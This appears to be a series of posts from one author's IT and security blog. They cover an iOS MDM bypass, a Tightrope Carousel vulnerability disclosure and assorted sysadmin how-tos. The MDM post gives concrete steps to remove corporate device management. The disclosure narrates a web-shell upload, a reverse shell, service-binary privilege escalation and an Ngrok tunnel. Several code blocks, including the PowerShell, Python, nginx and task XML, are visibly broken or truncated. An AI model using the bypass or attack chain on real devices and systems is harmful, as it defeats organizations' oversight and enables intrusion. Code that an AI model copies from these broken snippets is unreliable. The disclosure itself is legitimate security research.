iOS 13 MDM/DEP Bypass (using Checkra1n jailbreak)

Before anyone comments about this being a bad idea, let it be known that I’m not responsible for any trouble you may get in for doing this. I’m part of the hacking team at my organization, so this is the type of thing I’m supposed to be doing, but unless you are too, I’d probably advise against this.

Using Checkra1n on my iPhone 8 running iOS 13.2.2 (downgraded from 13.2.3), I have successfully found how to bypass organizational MDM (forced through DEP). In my test case, I was using Blackberry’s MDM services, but I believe this should probably work for any MDM provider.

I’m going to leave these instructions relatively vague. If you can follow them, go for it; if you can’t, you probably should not be jailbreaking your corporate device.

NOTE: This is on a device that has been freshly wiped, or at least had the contents of “/var/containers/Shared/SystemGroup/” removed. If you already have MDM applied to your device, try wiping the contents of that directory and rebooting. It’ll probably reset a lot of settings, but that seemed to remove MDM for me (and allow me to prevent its application) after a reboot.


  1. Jailbreak your device using Checkra1n.
  2. On your phone, walk through the “Welcome” wizard, set your wifi, and then when you get to the screen that says “Your organization requires policies” (not verbatim, but that’s the general message), move on to Step 3.
  3. Connect to your device using SSH via iProxy (username is root, password is alpine).
  4. Using SSH on the device, navigate to “/var/containers/Shared/SystemGroup/”.
  5. Ensure the following 2 files are present: “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”.
  6. If not already installed, install the “nano” text editor on your device via “apt” (or use vi, if that’s there by default, which I assume it is).
  7. Using your text editor, modify both “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”, making the following changes to both files:
    • NOTE: If any of these variables are not present, you can try just leaving them missing. If that doesn’t work, add them with the values I’ve specified.
    • Change the value of the integer “IsMDMUnremovable” to 0.
    • Change the value of the bool “IsMandatory” to false.
    • Change the value of the bool “IsSupervised” to false.
  8. Restart your device (you can either re-jailbreak it using Checkra1n or just let it boot normally; either should be fine).
  9. When booted back up, walk through the “Welcome” wizard again, and this time when you get to the corporate policy screen, click through it. You should have the option to ignore the policies and not apply them.
  10. That’s it. After you reboot again, the device will still be activated but without any MDM.

NOTE: I wrote this shortly after figuring this process out. It’s possible that the policies will attempt to re-apply periodically and/or after an iOS upgrade, but I don’t know for sure. I’ll edit this post if I find any further info.

Edit: Just found this post, which says that hex-editing the Checkra1n app to increase the max_supported_version number to iOS 13.2.3 should allow devices on the most recent iOS release to be jailbroken without needing to downgrade.

Edit2: I just upgraded to 13.2.3 and my MDM-bypass is still fine (I was not prompted to re-enroll after upgrading).

Vulnerabilities in Tightrope Media Systems Carousel <= (and likely newer)

While on a recent penetration test, I discovered a digital signage system made by Tightrope Media Systems (TRMS). The client was using this software on an appliance provided by TRMS which was essentially an x86 Windows 10 PC. I was able to gain access into the web-interface of this system due to an unchanged default administrator password. I found references online to a vulnerability in the version of this system that allows for an arbitrary file read (LFI) on the system via the RenderingFetch API function (CVE-2018-14573). By reading the CVE and the API documentation, I was able to successfully read files on the system.

Local File Inclusion (LFI) via the RenderingFetch API

I attempted to read protected files, such as the SQL database of the application itself (expecting it to fail, as even if the user account did have read permission to this file, the file would have been locked). Eventually though, I found that the system included a handy database backup function which included the ability to email the backed up file to an arbitrary address. I emailed a copy of the database to myself, but found that due to a bug in the system, it did not include the actual db I wanted, just the secondary db that did not include any user authentication details.

After this disappointing result, I set out to find other ways to compromise the system. I explored the Carousel webui and found something interesting. This interface allows for the uploading of “bulletins”, or in other words, items to display on the digital signage screen.

Carousel bulletin management page

I analyzed the bulletin import mechanism and found that it appeared to accept ZIP files for uploading. Upon attempting to upload a random file, however, it was rejected as not properly formatted. In order to identify the format of these files, I found that I could export an existing bulletin and then open this ZIP file up on my system to look at the structure. Inside of the file, there is a folder called “Pages”, with another folder within that named with a random GUID. I inserted two malicious .ASPX files and then attempted to upload the file.

Malicious ASPX files inside of exported bulletin ZIP file

After this, I was able to successfully upload the ZIP file to the system. I identified the GUID of the newly created (via import) bulletin by looking at the URL attached to the preview image on the webui. To clarify, the GUID inside of the ZIP file is not the GUID once it’s imported into the system. I then attempted to navigate to the URL of the malicious ASPX files I had inserted into the ZIP, but they were not found.

Frustrated, I analyzed the original ZIP file via unzip on Linux, along with 7-Zip on Windows. It appeared that when inserting files into this ZIP archive, the path separator for files and directories was being set to the forward-slash character (“/”) rather than the backslash character (“\”). This caused the files I added to be discarded by the server upon upload. I was eventually able to see this clearly by opening the file in a hex editor.

Bad ZIP file with improperly-formatted additional file

I decided to try to manually change the “/” to a “\” for the files I added to the archive with a hex editor. I just selected the wrong character, typed the right character, and then saved the file. “Surely this will not work”, I thought.

ZIP file after modifying the path-separator character of the newly added files with a hex editor

After modifying the ZIP file with the hex editing tool, I uploaded it to Carousel and found it listed in the main bulletin listing (as I had with my first attempt). I then selected the bulletin and inspected the URL of the preview image (to determine the GUID and full-path to the directory where my files had been imported).

Malicious bulletin archive successfully imported

After identifying the path to the imported files, I attempted to navigate to my malicious ASPX files in that directory. Sure enough, they loaded! I was able to successfully execute commands on the system via a web shell. I first attempted a standard directory listing of the C:\ drive, and then ran whoami.

Directory listing of C:\ drive
whoami showing application being run in context of IIS AppPool\Carousel

Running commands via the web shell became a bit tiresome, so I decided to upload a Powershell file that would connect a remote interactive shell back to my attacking system.

Downloading reverse shell to target system via Powershell
Reverse shell successfully downloaded to target system

I started a listener on my attacking machine and executed the reverse shell Powershell script via the web shell, which caused the targeted system to connect back to me and provide a fully-interactive command prompt.

With that, I had achieved arbitrary file upload and remote code execution on this system. This has been classified as CVE-2018-18930.

Despite having fully-interactive access to this system, I was still running in the context of a restricted account. I set out looking for a way to elevate my privileges. I noticed that the path that uploaded files are saved to was C:\TRMS\Web\Carousel\Media. This meant that the restricted IIS account had write-access to at least that folder. I navigated to the C:\TRMS directory and saw that it appeared an application (an installed application, as opposed to the web app) was running from another directory under the C:\TRMS folder. I issued a command to view the services running on the system and the user accounts they run under. I found two services with “Carousel” in the name running under the SYSTEM account.

Two Carousel services running as SYSTEM

After identifying these services, I issued another command to identify the path at which the executables these services used were located.

Paths of the Carousel services

I then executed a command to show the permissions (ACL) of service executables, trying to identify if we had the ability to modify these files. Sure enough, the “NT Authority\Authenticated Users” group had “Modify” permissions to the service exe file.

“NT Authority\Authenticated Users” with “Modify” permissions to Carousel.Service.exe

I built a small exe file in C# that would execute various commands I compiled into the application, such as a command to create a user account. I moved the original exe file and uploaded my malicious exe to the location the service exe resides.

Malicous exe (Carousel.Service.exe) uploaded, after renaming original

I now needed to restart the service. Unfortunately, the user account I was running under did not have permission to restart services on this system. I found that it did, however, have the ability to restart the server. I ran a command to reboot, knowing that this would achieve the same thing as restarting the service (albeit with slightly higher risk, as the entire system would go down temporarily). After the system came back up, I ran a command to view the local users and administrators on the system and found that my account had been created and was now a local admin!

Rebooting system to restart service
User account “gfsec” created an a member of the local admins group

Now armed with a local user account belonging to the admin group, I attempted to connect remotely directly to SMB. I found, however, that the configuration of this machine did not allow for connections to essentially anything except 80 and 443. Turning off the firewall didn’t seem to help. I ended up uploading Ngrok to the system. Ngrok is a free application/service that allows for bypassing NAT and firewalls, generally used for web development when developers do not have the ability to open up holes in their firewall and forward ports. The application runs on the target system and connects to a local port of your choosing that you wish to connect to from remotely. Then, you are given a randomly generated URL and port number for which you can connect to your target system from anywhere in the world. I ran this on the Carousel system and pointed it at the local SMB port of 445.

Ngrok running, attached to local port 445

After making the SMB port available to remote systems, I was able to authenticate via SMB with Metasploit and have full control over the system conveniently. This privilege-escalation vulnerability has been assigned CVE-2018-18931.

While exploring the system, I eventually uncovered the remnants of a system image deployment. When Windows systems are imaged, administrators can use an Unattend.xml file to control various settings on the new system. This includes local accounts and passwords. I found that the Unattend.xml file left on the system included the creation of a local admin account (along with the password). This default password has been assigned CVE-2018-18929.

Tightrope Media Systems was notified of these vulnerabilities on in early November 2018. They responded back on 11/13/2018 stating that they believed these bugs were fixed and requested the contact info of my client to ensure they were on the latest version. They have not followed-up with me to discuss with them the specifics of these vulnerabilities. Now that approximately 90 days have elapsed since original disclosure, this information is being made publicly available.

UPDATE (2/7/19): Tightrope Media Systems has reached out to me regarding this post and the vulnerabilities discussed. They apologized for the way that the situation was handled on their end and have stated their intention to review how they triage reported security issues. The CEO personally thanked me for my contribution to their security and committed to improving their internal processes. This is a lot better than being threatened with litigation, as has happened to me in the past from other vendors, so I applaud TRMS for their response after this came to their attention (again). If you are a customer, they have released a bulletin regarding the CVEs along with a workaround to mitigate some of the disclosed issues. They are planning to release a patch on 2/8/19.

Converting a Cheap ($2) ST-Link v2 Clone into a Hardware GPG Key

Several weeks back, I decided to re-explore the concept of hardware devices for storing GPG keys.  The Yubikey Neo, 4, and 5 all have this functionality (with varying key-length options depending on the model), but these devices are not inexpensive ($40+, though Wired magazine has been running a deal for the past several months where you can get a Yubikey 4 with a 1-year subscription to the magazine for $5).  In my search for inexpensive alternatives, I came across this post, where the author purchased very inexpensive ST-Link v2 clone devices and changed the firmware to an open-source hardware GPG implementation, called Gnuk.  I have dabbled with hardware hacking more and more over the past few years, and I’m no stranger to flashing firmware (for example, I’ve been a long-time fan of DD-WRT and OpenWRT), so I thought this sounded like a really great project.  The article was well written and had links to everything I needed to buy and install, so everything should be easy, right? Of course not, it never is, and that’s why I am writing this post rather than just letting you find the one I originally worked off of.

I was not initially familiar with the ST-Link v2, but I learned that it is a hardware tool used for interfacing with devices via SWD (Serial Wire Debug).  SWD is a protocol found in ARM devices and uses fewer wires than JTAG.  STMicroelectronics makes the official ST-Link v2 device, which I see via a Google search for between $10 – $25.  AliExpress, however, has tons of sellers offering clone devices for approximately $2.  These devices feature an STM32F103 microcontroller, which is compatible with the Gnuk firmware (or in other words, Gnuk offers this chip as a build target).  I went searching on AliExpress and found myself the cheapest device I could (factoring in shipping) and bought 5 units.  Why 5?  I figured it’d be a cool little geek gift for some of my friends, potentially, but realistically I anticipated breaking at least one of them.  Also, the nice thing about these devices is that you need an SWD programmer to re-flash the devices themselves, so you can actually use one of them to program the other ones.  My order was estimated to arrive in 19-39 days, and I was pleasantly surprised when they arrived in around 15 days.

The programmer with the cover on

With the devices now on hand, I began by compiling the firmware.  That was my first stumbling block.  The repo where the project is stored had moved since the article I was referencing was published, so I needed to track that down.  Eventually I found the repo, and cloned it onto my dev system (for reference, I was using Kali Linux, since that was the only Linux VM I had on my machine; any Debian-based variant should work fine with my instructions).

git clone
cd gnuk/
git submodule update --init
cd src/
./configure --vidpid=234b:0000 --target=ST_DONGLE
mkdir build

Once I built the firmware, I now needed to attach the device to my debugger and connect using OpenOCD.  Initially, I tried using one of the ST-Link v2 devices I had purchased for programming another unit, but upon running into issues I instead tried using my Bus Pirate, which also supports SWD.  However, I was unsuccessful in connecting to the device with either of these programmers.  Multiple reference articles mentioned the debug layout as (starting from the spot closest to the USB port): SWDIO, GND, SWCLK, v3.3.  Upon further inspection, I found that the units I had were physically different than those pictured in the article I referenced (and another that I found later).  In the reference posts, the 4 debug points on the board were holes, going all the way through the board.  On mine, however, they were just pads.  The underside of the boards did not have any appearance of being connected to the topside, so I was not able to poke probes through the board for a good connection.  That was the first hardware problem I encountered.  I found that if I connected v3.3 and GND from the debugger to the target device (on the header pins, rather than the debug pads) I could power the device just the same as if I were connecting them to the debug pads, meaning I had fewer unwieldy connections to deal with.  When that was connected, the device powered up, but I could not get any type of a data connection.  For note, I was using clips to connect to the board, that way I could grab on to the pads since I couldn’t push anything through.

I decided that I would solder my probes to the board.  So, I needed to buy a soldering iron, since I had no clue where mine was (it’d been years).  I decided on a kit that contained a multimeter included, that way I could test the voltage levels coming from the board.  I want to approach this slightly less blindly than I had thus far.  Once that kit arrived, I attempted to solder wires to the 2 data pads on the board (pads 1 and 3, if counting from 1, with 1 being closest to the USB port).  I *finally* was able to get it soldered (this stuff is really small!), but I still could not get it to connect to the ST-Link or Bus Pirate. Also, I burned the crap out of some of the debug points in the process (some out of error, some out of frustration).  I then bust out the multimeter and started probing the board.  What I found was that the points on the board were not only physically different than the reference article boards, but they were actually arranged differently too.  I found that point 1 was v3.3, and point 4 was GND.  Upon connecting power to point 1 and ground to point 4, the LED lit up just as it had when connecting to the header pins, so I knew at least those points were correct.  Point 2 and 3 had to be SWDIO and SWCLK, right?  Thankfully there are only 2 combinations I needed to test to identify which point was which.  Guess which combination worked? Neither!

One of the devices that I burned the crap out of debug points 1 and 3

At this point I was at a loss.  I thought I had done everything correctly from a trouble-shooting standpoint, but I could not explain why those two points on the board would not give me debug access.  In my frustration, I ended up buying 2 more sets of 5 boards each from AliExpress, from 2 different sellers, each with multiple pictures of the board showing that they had debug holes rather than pads.  That was 2 days ago, and now I needed to wait another 15-30 days for them to arrive.  So much for this being an easy, fun project… For reference, these are the two ones that I bought that I’m still waiting to arrive that *should* be much easier to make work:, This is the bad one (stay away from it!):

I’m curious and impatient, though.  So yesterday I decided to take one more stab at this.  I had no idea what debug points 2 and 3 were on that board and why they would not give me SWD access to the chip.  However, I knew what the chip itself was (due to the imprint on it that said “STM32F103”), so I thought that could help.  I Googled the pinout of the chip and identified the SWDIO and SWCLK pins.  In the image below, you can see that pin 34 corresponds to SWDIO and pin 37 is SWCLK.

STM32 chip pinout

So, now that I knew which pins on the actual chip were needed for debugging, I attempted to connect my clips to the pins.  This was about as difficult at first as I expected, as these pins are super small.  I couldn’t get pin 34 connected by itself, though I appeared to be able to connect pin 37 (since it was at the end of a row, and as such easer to grab).  Eventually though, I decided to give up on precision and just to attempt to make contact with the pins by grabbing each one needed and a few around it.  That was much easier than attaching just to the single needed pins.  Note: I don’t know if this would work on similar or different chips, and I suppose it could potentially cause damage, so proceed with caution.

Connected to pins 34 and 37 directly on-chip

I fired up OpenOCD using my Bus Pirate, and was finally able to connect!  Hallelujah!  I was able to execute the needed commands to unlock the device, reset it, and erase the flash.  However, I was not able to write my firmware file.  Maybe I was just too impatient, but I literally gave this thing 20+ minutes to write a 128KB file, and it just wouldn’t.  From the other posts I read, it appeared from the output of OpenOCD that it should only take a matter of seconds to write the file.  Frustrated again, I decided to try to use one of the devices I bought to act as the debugger, too.  I used the OpenOCD configuration below to connect.

Note: if you don’t have OpenOCD already, you can install it by typing:

sudo apt install openocd

OpenOCD config for ST-Link v2 (called openocd.cfg moving forward):

telnet_port 4444
source [find interface/stlink-v2.cfg]
source [find target/stm32f1x.cfg]
set WORKAREASIZE 0x10000

To connect, run the command:

openocd -f openocd.cfg

You should see the a message about connecting to the device, and it should not exit within a few seconds. After that, you need to open a new terminal and connect to OpenOCD using Telnet:

telnet localhost 4444

Once connected via Telnet, you need to unlock the device, reset it, erase memory (for good measure), write the Gnuk binary, lock the device, and then reset it once more:

reset halt
stm32f1x unlock 0
reset halt
stm32f1x mass_erase 0
flash write_bank 0 /root/src/build/gnuk.bin 0
stm32f1x lock 0
reset halt

After that, once you connect the device to the USB port of your machine it should be detected as a GPG card! You can confirm by running the command:

gpg --card-status


Fix for Cron Failing on VMware vCenter Server Appliance (VCSA) 6.5

drew 19 Apr , 2017 1 Comment VMware

When trying to enable scheduled jobs via cron on VMware VCSA 6.5 I kept seeing the errors below, and my job would not run.

2017-04-19T09:56:01.996673-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.996797-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.996907-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.997010-04:00 VCSA crond[104661]: (root) PAM ERROR (Permission denied)
2017-04-19T09:56:01.997116-04:00 VCSA crond[104661]: (root) FAILED to authorize user with PAM (Permission denied)

The contents of /etc/pam.d/crond had 3 references to “password-auth”, however there was no file in /etc/pam.d called “password-auth”.  I changed “password-auth” to “system-auth” in /etc/pam.d/crond, as seen below, and everything worked.

account required
account include system-auth
session required
session include system-auth
auth include system-auth

Solution for Subnet Conflict Between VPN and LAN

We had an issue at work where VPN users are having intermittent difficulty reaching servers due to a subnet conflict, ie the VPN network is 192.168.1.X, and so is the LAN they’re connecting from. It displayed itself in a strange way: application connections would fail repeated attempts, but after pinging the servers in question the first ping would fail but the next 3 would work, and then the application would work, for a while. Finally I developed a solution for this. Here’s what I did: create a Powershell script that identifies the IP address of the VPN connection, then create a static route for the and subnets (since that’s another common home subnet, as well as one running at the office) going out the VPN connection’s IP with a lower metric number than everything else. Then, set a scheduled task to run automatically when the VPN connection occurs (task triggered by event). Save the script as “Fix_VPN.ps1” at the root of the C drive and import the scheduled task (you may need to make sure that the event I have triggering this is also being generated by whatever VPN solution you’re using; we’re using built in RAS (SSTP)).

Powershell Script:

$ErrorActionPreference= 'silentlycontinue'
$ip = $null
$nics = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
foreach ($nic in $nics) {
   if($nic.Name -like "*VPN*"){
      $props = $nic.GetIPProperties()
      $addresses = $props.UnicastAddresses
      foreach ($addr in $addresses) {
         $ip = $($addr.Address.IPAddressToString)
if($ip -ne $null){
   route delete METRIC 1 | Out-Null
   route delete METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null

Scheduled Task:

   <?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="">
          <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Rasman'] and EventID=20267]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
        <Principal id="Author">
      <Actions Context="Author">

Nginx (Reverse SSL Proxy) with ModSecurity (Web App Firewall) on CentOS 7 (Part 1)

Today I’ll demonstrate how to install the Nginx webserver/reverse proxy, with the ModSecurity web application firewall, configured as a reverse SSL proxy, on CentOS 7.  This is useful in scenarios where you are terminating incoming SSL traffic at a centralized location and are interested in implementing a web application firewall to protect the web servers sitting behind the proxy.  This setup can also support multiple sites (ie different host names) using Server Name Indication (SNI) for SSL.  If multiple sites are being protected you will need a different SSL certificate for each site (unless a wildcard or SAN certificate will suffice for the sites in question, in which case SNI is not used).  There is an abundance of information available online showing how to do this on Ubuntu/Debian, but not for CentOS.  In Part 1 (this post) we’ll compile everything, install Nginx, and configure a reverse SSL proxy and in Part 2 we’ll configure ModSecurity.

The first step is to deploy a fresh VM with CentOS 7.  We are using the x64 version, but I don’t see why the x86 version would be any different.

Log on to the server and either elevate to a root shell or execute all commands below using sudo.

Here we are downloading and installing the EPEL (Enterprise Packages for Enterprise Linux)
repository to provide access to some of the prerequisite packages we need.  After that we install all of the required packages.

rpm -ivh       
yum update       
yum install gc gcc gcc-c++ pcre-devel zlib-devel make wget openssl-devel libxml2-devel libxslt-devel gd-devel perl-ExtUtils-Embed GeoIP-devel gperftools gperftools-devel libatomic_ops-devel perl-ExtUtils-Embed libtool httpd-devel automake curl-devel       

After installing all of the prerequisite packages we create a user named “nginx” for the daemon to run as.  We also set the login shell to “nologin” to prevent a compromised account from gaining access to a real shell.

useradd nginx       
usermod -s /sbin/nologin nginx       

Now let’s download ModSecurity to the /usr/src/ directory, untar it, and change to the unpacked folder.  At the time of this writing the latest version was 2.9.0.  You can find downloads for the latest version at

cd /usr/src/       
tar xzvf modsecurity-2.9.0.tar.gz       
cd modsecurity-2.9.0/       

Now inside the source directory, run, then configure with the “enable-standalone-module” option, and finally make the module.

./configure --enable-standalone-module       

After building the ModSecurity module, move back to the /usr/src/ directory, download Nginx, untar it, and then enter the unpacked directory.  The latest version of Nginx at the time of this writing was 1.9.7.  Newer versions can be found at

cd /usr/src/       
tar xzvf nginx-1.9.7.tar.gz       
cd nginx-1.9.7/       

After navigating to the extracted directory run configure, then make, and then make install.  The “add-module” option set with configure will point to the nginx/modsecurity/ directory which should be inside of the extracted ModSecurity directory from earlier.  The default behavior of nginx is to install to /usr/local/nginx, but in the command below we’re changing the location of where some files are stored. First, the binary “nginx” is being saved directly in /usr/sbin/ to make things easier dealing with $PATH. We’re setting the conf path to the /etc/nginx/ directory, the PID path to the /var/run/ directory, and the log paths to /var/log/nginx/. I have two reasons for changing these paths: 1 – to keep the respective folders in the standard locations, and 2 – to allow SELinux to function using default rules. There are default SELinux rules related to /sbin/nginx, /etc/nginx/, and /var/log/nginx/, and I’ve found it much easier to work with SELinux if I just keep everything possible in the locations that are already predefined. There will be more later showing how to add SELinux rules to account for the directories that aren’t predefined.

./configure --user=nginx --group=nginx --with-pcre-jit --with-debug --with-ipv6 --with-http_ssl_module --add-module=/usr/src/modsecurity-2.9.0/nginx/modsecurity --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/ --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log
make install       

Now let’s setup a systemd service to allow Nginx to autostart with the server.  In the first block of code we’ll navigate to the proper directory, then we’ll create a file to tell systemd what to do.  The second block of code will contain the contents of the file we created before that.

cd /usr/lib/systemd/system
nano nginx.service
# nginx signals reference doc:
Description=A high performance web server and a reverse proxy server

ExecStartPre=/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /var/run/


Now we need to edit the conf file for Nginx.  Before we do that though we create two folders: sites-available and sites-enabled, just like in Apache, to hold our vhosts.

mkdir /etc/nginx/sites-available
mkdir /etc/nginx/sites-enabled
nano /etc/nginx/nginx.conf

Change the config file to what’s listed below. NOTE: For “worker_processes” set the number to the number of cores you wish to dedicate to the server.

user nginx;
worker_processes  1;

events {
    worker_connections  1024;

http {
    include       mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    gzip  on;
    include /etc/nginx/sites-enabled/*;

Here we generate a Diffie-Hellman key larger than OpenSSL’s default size of 1024. We’ll do 4096.

cd /etc/ssl/certs
openssl dhparam -out dhparam.pem 4096

Now we need to create a folder to hold our SSL files. Inside of that folder we’ll create subfolders for each vhost’s certs. Though not shown below, place your certificate and key files in the vhost SSL directory. We also create a vhost config file in the sites-available directory.

mkdir /etc/nginx/ssl
mkdir /etc/nginx/ssl/localhost
nano /etc/nginx/sites-available/ssl.conf

Add the following to the file just created. Make sure for the “ssl_certificate” and “ssl_certificate_key” lines you point to the proper locations. Set the “server_name” line to the hostname of your server (make sure it matches the SSL certificate). Set the “proxy_pass” line to point to the server you’re proxying to. In the example below we’re connecting to port 80 locally, but in most cases this would be a separate server. If you have several SSL certificates and want to define one of the vhosts as default, add “default_server” on the “listen” line, between the port number and semicolon.

server {
        listen   443;

        server_name localhost;
        ssl                  on;
        ssl_certificate      /etc/nginx/ssl/localhost/localhost.crt;
        ssl_certificate_key  /etc/nginx/ssl/localhost/localhost.key;

        ssl_session_timeout  5m;

        ssl_protocols  TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
        ssl_prefer_server_ciphers on;
        ssl_session_cache shared:SSL:10m;
        ssl_dhparam /etc/ssl/certs/dhparam.pem;

        location / {
          proxy_set_header X-Real-IP  $remote_addr;
          proxy_set_header X-Forwarded-For $remote_addr;
          proxy_set_header Host $host;
          proxy_set_header X-Forwarded-Proto $scheme;
          proxy_read_timeout 90;

Create a symlink from the site(s) in the sites-available directory to the sites-enabled directory to activate the sites. Then test to make sure the config files don’t contain any errors.

ln -s /etc/nginx/sites-available/ssl.conf /etc/nginx/sites-enabled/ssl.conf
nginx -T

Assuming nginx -T doesn’t return any errors, everything should be all ready to go! Enable the service, start it, then verify it’s running.

systemctl enable nginx.service
systemctl start nginx.service
systemctl status nginx.service

If you need to open up the firewall to allow incoming traffic, use the command below

firewall-cmd --add-port=443/tcp --permanent
firewall-cmd --reload

Python – Mass-Mail w/ Attachment

I wrote a Python script today to mass-mail files to our clients. Our wonderful ERP system screwed up again, leaving us with PDFs of the information we needed to send out, the filenames being prefixed with a unique ID per-recipient. Rather than re-generate all documents and have them sent out properly (which likely wouldn’t have happened due to bugs in the system from a recent upgrade) we wrote this script to mail out the documents we already had. We created a CSV file with two columns: column one has the unique filename prefix, column two has the corresponding recipient’s email address.

import csv
import os
import smtplib
import mimetypes
from email.mime.multipart import MIMEMultipart
from email import encoders
from email.message import Message
from import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText

def readCSV():
    clientCSVList = []
        #set below to the CSV file you want to read.  Two columns:
        #1 - file prefix to search
        #2 - email address to send file to 
        with open("csvFile", 'rb') as csvfile: 
            clientReader = csv.reader(csvfile, delimiter=',')

            missing = 0
            for clientNum, email in clientReader:
                found = False
                for file in os.listdir("folder_with_files"):
                    if file.startswith(clientNum):
                        clientCSVList.append([clientNum, email, file])
                        found = True
                if found == False:
                    missing += 1
                    print clientNum + " " + email

        print clientCSVList
        print "Missing: " + str(missing)
    except Exception as e:
        print "Exception: " + str(e.args)

        for client in clientCSVList:
            send_email("[email protected]", client[1], "Email Subject Here", "This text is supposed to be the body, but doesn't seem to appear", client[2])
            print client[0] + " Success"

    except Exception as e:
        print "Exception: " + str(e.args)
        print client[0] + " Failure"

def send_email(sender, receiver, subject, message, fileattachment=None):
    emailfrom = sender
    emailto = receiver
    fileToSend = fileattachment
    username = "smtp_username"
    password = "smtp_password"

    msg = MIMEMultipart()
    msg["From"] = emailfrom
    msg["To"] = emailto
    msg["Subject"] = subject
    msg["Message"] = message
    msg.preamble = message

    ctype, encoding = mimetypes.guess_type(fileToSend)
    if ctype is None or encoding is not None:
        ctype = "application/octet-stream"

    maintype, subtype = ctype.split("/", 1)

    if maintype == "text":
        fp = open(fileToSend)
        # Note: we should handle calculating the charset
        attachment = MIMEText(, _subtype=subtype)
    elif maintype == "image":
        fp = open(fileToSend, "rb")
        attachment = MIMEImage(, _subtype=subtype)
    elif maintype == "audio":
        fp = open(fileToSend, "rb")
        attachment = MIMEAudio(, _subtype=subtype)
        fp = open(fileToSend, "rb")
        attachment = MIMEBase(maintype, subtype)
    attachment.add_header("Content-Disposition", "attachment", filename=fileToSend)

    server = smtplib.SMTP("server:25") #insert SMTP server:port in quotes
    server.sendmail(emailfrom, emailto, msg.as_string())

def main():

if __name__ == "__main__":

Office 365 Outlook Configuration Problem

drew 26 Apr , 2013 3 Comments Office 365

TL;DR – Disable IPv6 for the network adapter

I moonlight as the CIO of a startup owned by some friends in my spare time and decided last year that the best solution for a new business that didn’t want to invest any capital in computer hardware was cloud computing.  Their needs were fairly basic – email access.  No need for a dedicated Exchange box sitting in the non-existent server room.  However, access via Outlook and mobile devices was mandatory, as was calendar and contact sharing, so we opted to to go with a hosted Exchange solution rather than a service offering only POP or IMAP.  I chose Office 365 P1 (  At $6/month per-person, it was a no-brainer.

I set this up for my friends on their smartphones and laptops (and my own phone as well) and have been very happy with it since then.  However, Microsoft ran some upgrades 2 weeks ago (one of the major upgrades being moving to Exchange 2013).  During this upgrade (and afterwards), the company’s President was having issues with Outlook not connecting.  It worked fine on his phone, and we were usually able to get in through Outlook Web App, but Outlook was always hit or miss.  During one of these periods, I was unable to get into OWA myself, so I chocked it up to upgrade issues and told my friend to let me know if the problem persisted.  It did, so I went to work.

After testing out a few things within Outlook, I eventually removed the email account from the profile and attempted to re-add it.  This was a bad idea, as now Outlook would hang when trying to open the profile (which contained other important data).  Eventually I just removed the problematic account and we were able to get into the profile, but he still needed the account back.  This shouldn’t have been a difficult thing to do.  By default, Office 365 configures DNS settings for your domain, including Autodiscover, and my friend is using Outlook 2010 which should have worked flawlessly with this, but this was not the case.

The problem we were having was getting Outlook to configure the Exchange settings.  We would type the email address and password, and sometimes Outlook would autoconfigure itself using the Autodiscover settings, othertimes it would throw an error about “unable to establish an encrypted connection”.  After a few tries we manually input the server settings, but we were still unable to make the account work.  The strangest part is that after seemingly setting itself up properly using Autodiscover (which validated to me that we had the right settings), Outlook would hang when trying to authenticate, ie it would either not pop-up a username/password prompt, or sometimes it would, but then reject the credentials we gave it, we I had already validated were correct.

Anyways, after working with Microsoft Office 365 phone support for over an hour (which is included with the low-cost monthly subscription, by the way), I eventually gave up for the day and decided to try again in the morning.

The next morning I remoted back into my friend’s machine and tried again.  Same issues as before, sporadic issues that appeared sometimes but not others, and never able to fully complete the process.  At some point I decided to ping Google just to see what the response was (not sure what was going through my mind, but I’m thankful for whatever that was).  I noticed that I was receiving an IPv6 response back from Google.  WTF is this I thought.  Then I decided to check the network settings and came across my issue.  My friend was using a Verizon Wireless 4G aircard to connect to the Internet.  This card was so kind as to assign him both an IPv4 and an IPv6, standard operating procedure within Windows 7.  However, these were both public addresses, not a link-local (ie non-routable) IPv6 address.  I decided that Outlook was having some issue connecting to Office 365 because of this.  My best bet is that Outlook was trying to connect using IPv6, then failing over to IPv4 (but not consistently), which explained why *sometimes* it would connect to Autodiscover, but not othertimes, and why after it did successfully Autodiscover, we couldn’t make it past there.

My solution was simple: go into the network properties for the adapter and uncheck the IPv6 box.  No reboot required.  A problem that took several hours was solved in about 10 seconds.

Manually Run “Fix Permissions” From Recovery

I own a Samsung Galaxy Nexus running Android 4.0.4 (Ice Cream Sandwich).  My phone is rooted and running a custom recovery (Clockworkmod Touch  I’m not sure if it’s been the case since I purchased the phone (and originally had the most recent non-touch version of Clockworkmod) or if it’s after upgrading to the touch version of CWM or if it’s as a result of me installing a custom ROM and just generally f—ing with my phone, but “Fix Permissions” doesn’t work from recovery any more.  This wouldn’t be a big deal if I could run this from Rom Manager, however, my phone seems to stall every time I run this while Android is booted.  It appears that it hangs while processing running applications, as every time it stalled I exited out of Fix Permissions (in Rom Manager), force closed the app it stalled on, then re-ran Fix Perms, and I’d make a little bit more progress, only to stall again on another app.  Finally I FC’d enough apps that Fix Perms completed, but I had mixed feelings about the quality of the job I’d just performed.
